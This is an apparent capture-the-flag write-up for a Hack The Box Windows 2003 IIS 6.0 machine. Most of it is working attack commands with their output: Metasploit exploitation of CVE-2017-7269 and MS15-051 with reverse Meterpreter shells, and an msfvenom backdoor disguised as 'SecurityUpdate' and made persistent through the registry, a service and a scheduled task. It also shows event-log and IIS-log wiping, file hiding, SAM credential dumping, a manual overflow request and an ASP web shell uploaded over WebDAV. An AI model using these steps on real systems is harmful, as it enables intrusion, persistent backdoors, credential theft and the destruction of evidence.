Machine Synopsis
Key Exploitation Techniques:
- IIS 6.0 WebDAV enumeration and vulnerability identification
- CVE-2017-7269 buffer overflow exploitation
- Windows local privilege escalation (MS15-051)
- WebDAV method abuse for initial access
Reconnaissance & Enumeration
Port Discovery
1
2
3
| $ nmap -p- --min-rate 10000 10.10.10.14
PORT STATE SERVICE
80/tcp open http
|
Service Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
| $ nmap -p 80 -sC -sV 10.10.10.14
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|
WebDAV Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| # Test WebDAV functionality
$ davtest -url http://10.10.10.14
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.14
********************************************************
NOTE Random string for this session: aYYO9mgh
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.10.10.14/DavTestDir_aYYO9mgh
********************************************************
Sending test files
PUT txt SUCCEED: http://10.10.10.14/DavTestDir_aYYO9mgh/davtest_aYYO9mgh.txt
PUT aspx FAIL
PUT asp FAIL
PUT html SUCCEED: http://10.10.10.14/DavTestDir_aYYO9mgh/davtest_aYYO9mgh.html
|
Exploitation
CVE-2017-7269 Buffer Overflow
IIS 6.0 with WebDAV enabled is vulnerable to a buffer overflow in the ScStoragePathFromUrl function when processing PROPFIND requests.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| $ msfconsole -q
msf6 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show info
Name: Microsoft IIS WebDAV ScStoragePathFromUrl Overflow
Module: exploit/windows/iis/iis_webdav_scstoragepathfromurl
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Manual
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.3
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > check
[+] 10.10.10.14:80 - The target is vulnerable.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] 10.10.10.14:80 - Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.14:1030)
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| meterpreter > sysinfo
Computer : GRANPA
OS : Windows .NET Server (5.2 Build 3790, Service Pack 2).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > shell
Process 2156 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv> whoami
nt authority\network service
|
Privilege Escalation
Local Exploit Enumeration
1
2
3
4
5
6
| meterpreter > run post/multi/recon/local_exploit_suggester
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
|
MS15-051 Exploitation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| meterpreter > background
[*] Backgrounding session 1...
msf6 > use exploit/windows/local/ms15_051_client_copy_image
msf6 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 1
msf6 exploit(windows/local/ms15_051_client_copy_image) > set LHOST 10.10.14.3
msf6 exploit(windows/local/ms15_051_client_copy_image) > exploit
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Launching notepad to host the exploit...
[+] Process 2548 launched.
[*] Reflectively injecting the exploit DLL into 2548...
[*] Injecting exploit into 2548...
[*] Exploit injected. Injecting payload into 2548...
[*] Payload injected. Executing exploit...
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 2 opened (10.10.14.3:4444 -> 10.10.10.14:1032)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
|
Flag Collection
meterpreter > shell
Process 2548 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32> whoami
nt authority\system
C:\WINDOWS\system32> cd "C:\Documents and Settings\Harry\Desktop"
C:\Documents and Settings\Harry\Desktop> type user.txt
bdff5ec67c3cff017f2bedc146a5d869
C:\WINDOWS\system32> cd "C:\Documents and Settings\Administrator\Desktop"
C:\Documents and Settings\Administrator\Desktop> type root.txt
9359e905a2c35f861f6a57cecf28bb7b
Post-Exploitation Techniques
Persistence Methods
Registry Persistence
1
2
3
4
5
6
7
8
9
10
| # Create payload for persistence
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=5555 -f exe -o backdoor.exe
# Transfer via Meterpreter
meterpreter > upload backdoor.exe C:\\WINDOWS\\system32\\backdoor.exe
# Add registry auto-start entry
C:\WINDOWS\system32> reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\WINDOWS\system32\backdoor.exe"
# Verify persistence
C:\WINDOWS\system32> reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
|
Service Installation
# Create persistent service
C:\WINDOWS\system32> sc create "SecurityUpdate" binpath= "C:\WINDOWS\system32\backdoor.exe" start= auto
[SC] CreateService SUCCESS
C:\WINDOWS\system32> sc start "SecurityUpdate"
[SC] StartService SUCCESS
# Setup handler for backdoor connections
$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.3
msf6 exploit(multi/handler) > set LPORT 5555
msf6 exploit(multi/handler) > exploit
Scheduled Task (Windows 2003)
# Create scheduled task using AT command (Windows 2003)
C:\WINDOWS\system32> at 15:00 /every:M,T,W,Th,F,S,Su "C:\WINDOWS\system32\backdoor.exe"
Added a new job with job ID = 1
# List scheduled tasks
C:\WINDOWS\system32> at
Status ID Day Time Command Line
-------------------------------------------------------------------------------
1 Each M T W Th F S Su 3:00 PM C:\WINDOWS\system32\backdoor.exe
Defense Evasion
Log Cleanup
# Clear Windows Event Logs (Windows 2003 method)
C:\WINDOWS\system32> for /f "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
# Alternative method for Windows 2003
C:\WINDOWS\system32> del "C:\WINDOWS\system32\config\*.evt"
# Clear IIS logs
C:\WINDOWS\system32> del "C:\WINDOWS\system32\LogFiles\W3SVC1\*.log"
File Attribute Manipulation
# Hide backdoor files
C:\WINDOWS\system32> attrib +h +s +r C:\WINDOWS\system32\backdoor.exe
# Timestamp manipulation
C:\WINDOWS\system32> copy /y C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\backdoor.exe
Lateral Movement Preparation
Network Discovery
# Discover network hosts
C:\WINDOWS\system32> for /L %i in (1,1,254) do @ping -n 1 -w 200 10.10.10.%i | findstr "Reply"
# Port scanning with telnet
C:\WINDOWS\system32> telnet 10.10.10.1 80
C:\WINDOWS\system32> telnet 10.10.10.1 443
Credential Harvesting
# Dump SAM database
C:\WINDOWS\system32> reg save HKLM\SAM C:\WINDOWS\Temp\sam
C:\WINDOWS\system32> reg save HKLM\SYSTEM C:\WINDOWS\Temp\system
# Search for stored credentials
C:\WINDOWS\system32> dir /s /b C:\ | findstr /i password
C:\WINDOWS\system32> dir /s /b C:\ | findstr /i config
Service Enumeration
# List running services
C:\WINDOWS\system32> net start
# Query specific services
C:\WINDOWS\system32> sc query state= all | findstr "SERVICE_NAME"
# Check for vulnerable services
C:\WINDOWS\system32> wmic service get name,displayname,pathname,startmode | findstr /i "auto"
Alternative Exploitation Methods
Manual WebDAV Exploitation
1
2
| # Manual buffer overflow using curl
$ curl -X PROPFIND "http://10.10.10.14/" -H "Content-Type: text/xml" -d '<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/><getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/><checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>' -H "Content-Length: 0" -H "If: <http://10.10.10.14:80/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> (Not <locktoken:write1>)" -v
|
WebDAV File Upload Exploitation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| # Upload ASP shell via WebDAV MOVE method
$ cat > shell.txt << 'EOF'
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c " & Request.QueryString("cmd"))
o = cmd.StdOut.Readall()
Response.write(o)
%>
EOF
# Upload and rename
$ curl -X PUT "http://10.10.10.14/shell.txt" -d @shell.txt
$ curl -X MOVE "http://10.10.10.14/shell.txt" -H "Destination: http://10.10.10.14/shell.asp"
# Execute commands
$ curl "http://10.10.10.14/shell.asp?cmd=whoami"
|